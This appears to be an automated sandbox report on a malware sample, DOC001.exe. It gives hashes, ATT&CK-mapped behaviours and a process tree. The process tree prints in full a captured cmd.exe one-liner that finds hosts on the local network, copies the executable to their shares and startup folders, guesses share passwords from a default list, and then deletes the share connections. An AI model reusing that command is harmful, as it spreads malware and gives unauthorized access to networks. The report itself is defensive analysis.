a2a8c316a9e35992827f58a2f47d6db71da352e6210d235a20075baa996b28cd

General

Target

DOC001.exe
Size

1.1MB
MD5

c720ac483a5752c2b69945a8ad673162
SHA1

a91be77fa1bc117c34b3e652706e3b276b487769
SHA256

856777e16c153722ebd3f389197d4b6482f8afb2e51345e1ab19760c486c3f78
SHA512

68f7cde69539fa53692c358aa439a52e73ef9628427f3c9a3b310f71ec107d7dc6dc1a19323cad728b6ed6912eb0bf52e618c6097a1069e5d493b10e699ede82
SSDEEP

12288:hhczyLe1sGZ7Bg5uPRwr05vzSBwepQZ2XcCDsceWiJklfViHen3wUN4uZycTWKCg:hE7ZtIvezxepQ4sGscezCPHN0QQRq4U

Score

8^/10

defense_evasion discovery persistence

Malware Config

Signatures

Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
2644	cmd.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	DOC001.exe

Executes dropped EXE 1 IoCs

pid	Process
2792	DOC001.exe

Loads dropped DLL 5 IoCs

pid	Process
2092	DOC001.exe
2792	DOC001.exe
2792	DOC001.exe
2792	DOC001.exe
2792	DOC001.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\	DOC001.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\	DOC001.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	DOC001.exe

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2856	cmd.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DOC001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DOC001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x0008000000016b86-3.dat	nsis_installer_1
behavioral1/files/0x0008000000016b86-3.dat	nsis_installer_2

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
1672	net.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2092 wrote to memory of 2792	2092	DOC001.exe	30
PID 2092 wrote to memory of 2792	2092	DOC001.exe	30
PID 2092 wrote to memory of 2792	2092	DOC001.exe	30
PID 2092 wrote to memory of 2792	2092	DOC001.exe	30
PID 2792 wrote to memory of 2644	2792	DOC001.exe	32
PID 2792 wrote to memory of 2644	2792	DOC001.exe	32
PID 2792 wrote to memory of 2644	2792	DOC001.exe	32
PID 2792 wrote to memory of 2644	2792	DOC001.exe	32
PID 2644 wrote to memory of 2856	2644	cmd.exe	34
PID 2644 wrote to memory of 2856	2644	cmd.exe	34
PID 2644 wrote to memory of 2856	2644	cmd.exe	34
PID 2644 wrote to memory of 2856	2644	cmd.exe	34
PID 2856 wrote to memory of 1672	2856	cmd.exe	35
PID 2856 wrote to memory of 1672	2856	cmd.exe	35
PID 2856 wrote to memory of 1672	2856	cmd.exe	35
PID 2856 wrote to memory of 1672	2856	cmd.exe	35
PID 2856 wrote to memory of 1292	2856	cmd.exe	36
PID 2856 wrote to memory of 1292	2856	cmd.exe	36
PID 2856 wrote to memory of 1292	2856	cmd.exe	36
PID 2856 wrote to memory of 1292	2856	cmd.exe	36
PID 2644 wrote to memory of 1400	2644	cmd.exe	37
PID 2644 wrote to memory of 1400	2644	cmd.exe	37
PID 2644 wrote to memory of 1400	2644	cmd.exe	37
PID 2644 wrote to memory of 1400	2644	cmd.exe	37

C:\Users\Admin\AppData\Local\Temp\DOC001.exe
"C:\Users\Admin\AppData\Local\Temp\DOC001.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2092
- C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe
  "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2792
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))
    3⤵
    - Indicator Removal: Network Share Connection Removal
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2644
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"
      4⤵
      Network Service Discovery
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2856
    - - C:\Windows\SysWOW64\net.exe
        
        net view
        5⤵
        System Location Discovery: System Language Discovery
        Discovers systems in the same network
        
        PID:1672
    - - C:\Windows\SysWOW64\find.exe
        
        find /i "\\"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1292
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c set str_
      4⤵
      System Location Discovery: System Language Discovery
      PID:1400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Indicator Removal

1

T1070

Network Share Connection Removal

Modify Registry

Credential Access

Discovery

Network Service Discovery

1

T1046

Network Share Discovery

1

T1135

Peripheral Device Discovery

Query Registry

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\nso4F0B.tmp\inetc.dll

Filesize
21KB

MD5
d7a3fa6a6c738b4a3c40d5602af20b08

SHA1
34fc75d97f640609cb6cadb001da2cb2c0b3538a

SHA256
67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

SHA512
75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

Download Submit
\Users\Admin\AppData\Roaming\Tempo\DOC001.exe

Filesize
1.1MB

MD5
c720ac483a5752c2b69945a8ad673162

SHA1
a91be77fa1bc117c34b3e652706e3b276b487769

SHA256
856777e16c153722ebd3f389197d4b6482f8afb2e51345e1ab19760c486c3f78

SHA512
68f7cde69539fa53692c358aa439a52e73ef9628427f3c9a3b310f71ec107d7dc6dc1a19323cad728b6ed6912eb0bf52e618c6097a1069e5d493b10e699ede82

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads